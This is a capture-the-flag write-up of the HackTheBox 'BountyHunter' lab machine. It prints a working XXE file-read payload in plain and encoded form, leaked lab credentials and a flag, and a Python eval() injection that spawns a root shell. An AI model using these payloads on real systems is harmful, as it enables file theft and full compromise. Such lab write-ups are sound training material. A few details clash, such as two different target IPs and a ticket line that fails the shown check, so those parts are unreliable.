BountyHunter 10.10.11.100
by [email protected], 11 Sep 2021

Background

BountyHunter is a Linux base machine from HackTheBox that required your patient on web searching technique with some encoding concepts and Python Hacking skill is required on the privilege escalation.
XXE is the technique using for gaining initial access. The web application is vulnerable to the XML injection that allows an attacker to interfere with an application's processing of XML data. We can use this loophole to read some configuration files at the target system. A DB configuration file contains a login credential that can be used to gain access.
The initial account can execute a python script with root privilege. This python script is exploiting on one of these dangerous functions: eval(), exec() and input().
Target Machine: 10.10.11.110
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.11.100 -oG fkclai.nmap 2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.100 -o nmap-result.txt
1
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-05 22:26 HKT
2
Nmap scan report for 10.10.11.100
3
Host is up (0.23s latency).
4
5
PORT STATE SERVICE VERSION
6
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
7
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8
|_http-server-header: Apache/2.4.41 (Ubuntu)
9
|_http-title: Bounty Hunters
10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
11
12
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
13
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds
14
Copied!
Enumeration Strategies
No vulnerability was found on the SSH and HTTP service, it was going to review the web application to check any information leakage or misconfiguration.

Hacking Process Part 1 – Enumeration

With basic web enumeration using gobuster, a set of web pages was found and the following one was interesting with submission function.
Captured the HTTP Request
The data passed to the backend server was encoded by base64 and URL encoding. After decoded, an XML format payload was found as below.
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
3
<bugreport>
4
<title></title>
5
<cwe></cwe>
6
<cvss></cvss>
7
<reward></reward>
8
</bugreport>
Copied!

Possible XML Injection

Tried the XML External Entity (XXE) Injection Payload List, the site was injectable. The below files were access, finally, the db.php file contained a login credential.
  • /etc/passwd
  • /index.php
  • /db.php
The syntax of the injection payload was below and remind to encoded with base64 + URL encoding before being sent to the HTTP Request.
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
3
<bugreport>
4
<title>a</title>
5
<cwe>b</cwe>
6
<cvss>c</cvss>
7
<reward>e</reward>
8
</bugreport>
Copied!
Using this CyberChef tool for preparing the encoded payload.
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ%2BCgkJPHRpdGxlPmE8L3RpdGxlPgoJCTxjd2U%2BYjwvY3dlPgoJCTxjdnNzPmM8L2N2c3M%2BCgkJPHJld2FyZD5lPC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B
After submitting the above payload, the response HTML contained a set of base-64 encoded messages.
Decoded the message, a database login credential was found.
1
<?php
2
// TODO -> Implement login system with the database.
3
$dbserver = "localhost";
4
$dbname = "bounty";
5
$dbusername = "admin";
6
$dbpassword = "m19RoAU0hP41A1sTsq6K";
7
$testuser = "test";
8
?>
Copied!

Hacking Process Part 2 – Gaining Foothold

Using the credential found at the db.php to access the ssh service, however, failure to login.
According to the "passwd" file got from the above process, there was a user "development".
1
root:x:0:0:root:/root:/bin/bash
2
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
3
bin:x:2:2:bin:/bin:/usr/sbin/nologin
4
sys:x:3:3:sys:/dev:/usr/sbin/nologin
5
sync:x:4:65534:sync:/bin:/bin/sync
6
games:x:5:60:games:/usr/games:/usr/sbin/nologin
7
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
8
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
9
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
10
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
11
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
12
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
13
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
14
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
15
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
16
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
17
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
18
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
19
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
20
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
21
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
22
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
23
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
24
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
25
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
26
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
27
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
28
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
29
pollinate:x:110:1::/var/cache/pollinate:/bin/false
30
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
31
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
32
development:x:1000:1000:Development:/home/development:/bin/bash
33
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
34
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
35
Copied!
ssh using the account "development" with the password "m19RoAU0hP41A1sTsq6K" and the user flag was found.
a0929aa9a9ec25cec7bc41a139f2b829

Hacking Process Part 3 – Privilege Escalation

Just simple list out the sudo rights of this account, there was interesting stuff that was a python script execution as a root that no password input required.
Check the ticketValidator.py file
1
def load_file(loc):
2
if loc.endswith(".md"):
3
return open(loc, 'r')
4
else:
5
print("Wrong file type.")
6
exit()
7
8
def evaluate(ticketFile):
9
#Evaluates a ticket to check for ireggularities.
10
code_line = None
11
for i,x in enumerate(ticketFile.readlines()):
12
if i == 0:
13
if not x.startswith("# Skytrain Inc"):
14
return False
15
continue
16
if i == 1:
17
if not x.startswith("## Ticket to "):
18
return False
19
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
20
continue
21
22
if x.startswith("__Ticket Code:__"):
23
code_line = i+1
24
continue
25
26
if code_line and i == code_line:
27
if not x.startswith("**"):
28
return False
29
ticketCode = x.replace("**", "").split("+")[0]
30
if int(ticketCode) % 7 == 4:
31
validationNumber = eval(x.replace("**", ""))
32
if validationNumber > 100:
33
return True
34
else:
35
return False
36
return False
37
38
def main():
39
fileName = input("Please enter the path to the ticket file.\n")
40
ticket = load_file(fileName)
41
#DEBUG print(ticket)
42
result = evaluate(ticket)
43
if (result):
44
print("Valid ticket.")
45
else:
46
print("Invalid ticket.")
47
ticket.close
48
49
main()
50
Copied!
The python script read an input file with the extension .md and with the following logic
  • The first three lines of the input file should be
    1
    # Skytrain Inc
    2
    # Ticket to root
    3
    __Ticket Code:__
    Copied!
  • The fourth line must start with ** and a number with "+" at the end
  • The number is greater than 100 and mod 7 is 4
Ultimately, I found the magic number 102. The "eval" function was an advantage code here according to the article Python Hacking. In order to make the eval statement true and to make the hacking work, let eval one more condition
Finally, I created the following file
1
# Skytrain Inc
2
# Ticket to root
3
__Ticket Code:__
4
**102+ 2 == 104 and __import__('os').system('/bin/bash') == False
Copied!
Run the python script and got the root access

Conclusion

Prevent the XXE vulnerability can set the libxml_disable_entity_loader to true to sanitize the XML input file

Reference

GitHub - payloadbox/xxe-injection-payload-list: 🎯 XML External Entity (XXE) Injection Payload List
GitHub
Hacking Python Applications
Medium
Last modified 4mo ago